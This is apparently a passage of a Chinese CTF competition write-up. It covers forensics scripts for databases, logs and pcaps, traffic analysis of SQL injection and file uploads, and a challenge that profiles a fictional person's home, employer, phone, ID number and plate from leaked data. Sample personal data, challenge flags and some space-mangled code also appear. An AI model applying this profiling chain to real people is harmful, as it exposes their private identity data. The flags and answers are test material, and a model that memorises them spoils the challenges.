    return [f for f in os.listdir(directory) if f.endswith(".db")]

defcount_lat_lon(db_files):
    """统计所有数据库中 latitude 和 longitude 的出现次数"""
    lat_lon_counter = Counter()

    for db_file in tqdm(db_files):
        try:
            conn = sqlite3.connect(db_file)
            cursor = conn.cursor()

            # 获取所有表名
            cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
            tables = [row[0] for row in cursor.fetchall()]

            for table in tables:
                try:
                    # 检查表是否有 latitude 和 longitude 字段
                    cursor.execute(f"PRAGMA table_info({table})")
                    columns = {row[1].lower() for row in cursor.fetchall()}

                    if'latitude'in columns and'longitude'in columns:
                        cursor.execute(f"SELECT latitude, longitude FROM {table}")
                        rows = cursor.fetchall()
                        lat_lon_counter.update(rows)
                except Exception as e:
                    print(f"跳过表 {table}，错误: {e}")

            conn.close()
        except Exception as e:
            print(f"无法读取数据库 {db_file}，错误: {e}")

    return lat_lon_counter

defmain():
    directory = os.getcwd()  # 当前目录
    db_files = get_db_files(directory)

    ifnot db_files:
        print("未找到任何 .db 文件")
        return

    lat_lon_counts = count_lat_lon(db_files)

    # 按照出现次数降序排序，并仅保留前 5 项
    top_5_lat_lon = sorted(lat_lon_counts.items(), key=lambda x: x[1], reverse=True)[:5]

    for (lat, lon), count in top_5_lat_lon:
        print(f"({lat}, {lon}): {count} 次")

if __name__ == "__main__":
    main()

发现前几位分别是14.4455971，14.4455972，14.4455973...

于是去某德泄露的地图数据搜一下

第二问：张华强的公司名称（yiyi）

Important

• 张某喜欢在公司收快递，地址一般为工作地+公司的简写，如某某软件园凤凰传媒

• 参考爬取的企业工商信息，查询公司的正式名称

见第一问

第三问：张华强的手机号（yiyi）

Important

• 张某为企业的对外联络人

• 假设张华强仅有一个手机号，手机号为11位的明文数字

在爬取的网页中暴搜张华强可得到手机号

第四问：张华强的身份证号（yiyi）

Important

• 办理手机号或相关业务需要留存身份证

通过手机号检索爬取的网页得到

第五问：张华强的车牌号（yiyi）

Important

• 车牌号的格式为：省的简写+大写字母+空格+5位字符，如苏D PT666，苏D和PT666中间存在一个空格

查看图片可以看到车牌号和手机号均在图片上

那么批量ocr即可（这里使用火眼

数据攻防

第一问（duck0123）

在一个数据安全加密系统中，攻击者通过发现系统中的注入漏洞，成功绕过了加密机制并获取到了存储在系统中的用户密码（password）。该系统使用了某种加密算法来保护敏感数据，但由于在输入验证和加密模块之间存在漏洞，攻击者能够利用注入攻击注入恶意代码，从而绕过加密保护，直接访问到原始密码，请分析提供的附件，获取密码提交，密码为32位小写md5值。

手撸流量包sql注入，得到flag。#f84c4233dd185ca3c083c7b3dbc4ff8b

第二问（duck0123）

在一次数据安全渗透测试中，攻击者通过分析系统的文件上传机制，发现了一个潜在的漏洞。在文件上传点，攻击者通过尝试不同的文件名称和格式，成功地上传了一个恶意文件，并在服务器端执行。请分析提供的附件，获取配置文件调用的文件名称进行提交。

通过http.request.method == POST过滤流量包，找到上传数据包；

flag:2.abc

第三问（fupanc）

分析http.log文件中的内容，以一则数据为例：

======================================================
14:56:51http://192.168.5.105:80
======================================================
GET/profile_info?mobile_number=1&contact_phone=3HTTP/1.1
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:84.0)Gecko/20100101Firefox/84.0
Accept-Encoding:gzip,deflate
Accept:image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Connection:close
Host:127.0.0.1
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7,en-GB;q=0.6
Dnt:1
Sec-Ch-Ua-Mobile:?0
Sec-Ch-Ua-Platform:macOS
Sec-Fetch-Dest:image
Sec-Fetch-Mode:no-cors
Sec-Fetch-Site:same-origin
Content-Type:application/json


======================================================
HTTP/1.1200OK
Accept-Ranges:bytes
Content-Length:101
Content-Type:text/plain;charset=utf-8
Last-Modified:Tue,14May2024 06:56:51 GMT
Date:Tue,14May2024 06:56:51 GMT
Connection:close

{"name":"u77f3u5efa", "gender":"u5973", "phone":"13221367890", "id_card":"510521199611234202"}
======================================================

其中的name和phone就是这里需要的，然后搓一个脚本来进行收集即可：

import re
import json
import hashlib

defextract_info(log_content):
    pattern = r'{.*?}'
    matches = re.findall(pattern, log_content, re.DOTALL)

    counter = {}
    formatchin matches:
        try:
            data = json.loads(match)
            name = data.get("name", "").strip()
            phone = data.get("phone", "").strip()
            if name and phone:
                key = (name, phone)
                counter[key] = counter.get(key, 0) + 1
        except Exception as e:
            continue
    return counter


defbuild_plaintext(counter):
    sorted_items = sorted(counter.items(), key=lambda x: x[1], reverse=True)
    top3 = sorted_items[:3]

    plaintext = ""
    for (name, phone), leak_count in top3:
        plaintext += f"{name},{phone},{leak_count};"
    return plaintext


defmd5_encrypt(plaintext):
    m = hashlib.md5()
    m.update(plaintext.encode('utf-8'))
    return m.hexdigest()


if __name__ == "__main__":
    try:
        withopen("http.log", "r", encoding="utf-8") as f:
            log_content = f.read()
    except Exception as e:
        print(f"读取文件失败: {e}")
        exit(1)

    counter = extract_info(log_content)

    plaintext = build_plaintext(counter)
    print("拼接后的明文：")
    print(plaintext)

    md5_result = md5_encrypt(plaintext)
    print("MD5加密后的结果：")
    print(md5_result)

运行结果如下：

拼接后的明文：
王二蛋,15100266408,1053;石建,18623146812,1047;李二娃,13823137848,1037;
MD5加密后的结果：
4a7cb07cd31c9ef2090f5f9126c6a996

MD5加密后的结果即为所求的值。

数据跨境

第一问（yiyi）

import json
import scapy.allas scapy
from collections import defaultdict

defload_sensitive_domains(json_file):
    withopen(json_file, "r", encoding="utf-8") as f:
        data = json.load(f)

    sensitive_ips = {}
    for category in data["categories"].values():
        for domain, ip in category["domains"].items():
            sensitive_ips[ip] = domain

    return sensitive_ips

defanalyze_pcap(pcap_file, sensitive_ips):
    ip_counter = defaultdict(int)

    packets = scapy.rdpcap(pcap_file)
    for packet in packets:
        if packet.haslayer(scapy.IP):
            dst_ip = packet[scapy.IP].dst
            if dst_ip in sensitive_ips:
                ip_counter[dst_ip] += 1

    return ip_counter

deffind_top_ip(ip_counter):
    returnmax(ip_counter, key=ip_counter.get) if ip_counter elseNone

defmain():
    sensitive_json = "国外敏感域名清单.json"
    pcap_file = "某流量审计平台导出的镜像流量.pcap"

    sensitive_ips = load_sensitive_domains(sensitive_json)
    ip_counter = analyze_pcap(pcap_file, sensitive_ips)

    for ip, count in ip_counter.items():
        print(f"{sensitive_ips[ip]}:{ip}:{count}")

    top_ip = find_top_ip(ip_counter)
    if top_ip:
        print(f"nIP: {top_ip} ({sensitive_ips[top_ip]})-> {ip_counter[top_ip]}")

if __name__ == "__main__":
    main()

第二问（duck0123）

技术人员在分析流量审计设备导出的镜像流量数据时，发现其中包含敏感文件的传输，并已上报此次数据泄漏事件。幸运的是，每个文件都带有文件水印，可以通过水印信息确定泄漏源的 ID 和时间。请分析导出的流量数据，提取文件的水印信息，并将水印字符串作为答案提交。

1.导出ftp-data文件；

2.工具一把梭；

flag:id:09324810381_time:20250318135114

第三问（duck0123）

任务3：请分析审计导出的流量文件，确认是否存在内部人员与外部人员之间的语音通话记录。鉴于信息泄露的风险，请提取并还原所有相关通话内容，并根据对话内容提交答案。本题的答案由小写的26个英文字母组成。

wirshark-电话-sip流，注意要把左下角的limit前的勾去掉；一个一个听过去，听到第15个才是答案！

flag:jiangsugongjiangxueyuanjunlihuayu

原文始发于微信公众号（N0wayBack）：2025数字中国初赛 WP

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

crypto-AS（rec）

pwn-scsc(heshi)

pwn-boh(duck0123)

crypto-RSSA(rec)

ez_upload（yiyi）

api接口认证（xuanSAMA、chleynx）

模型安全

数据预处理安全

数据标注与完整性校验（Cain）

数据清洗与特征工程(chleynx、Cain)

隐私保护与恶意检测

样本对抗与数据投毒

对抗样本攻击 （Cain）

数据投毒攻击 （Cain）

数据析

取证与溯源

第一问（yiyi）

第二问（G3rling）

第三问

数据泄露与社会工程

第一问：张华强的居住地和工作地名称（yiyi）

第二问：张华强的公司名称（yiyi）

第三问：张华强的手机号（yiyi）

第四问：张华强的身份证号（yiyi）

第五问：张华强的车牌号（yiyi）

数据攻防

第一问（duck0123）

第二问（duck0123）

第三问（fupanc）

数据跨境

第一问（yiyi）

第二问（duck0123）

第三问（duck0123）

发表评论

在线咨询

微信

对抗样本攻击（Cain）

数据投毒攻击（Cain）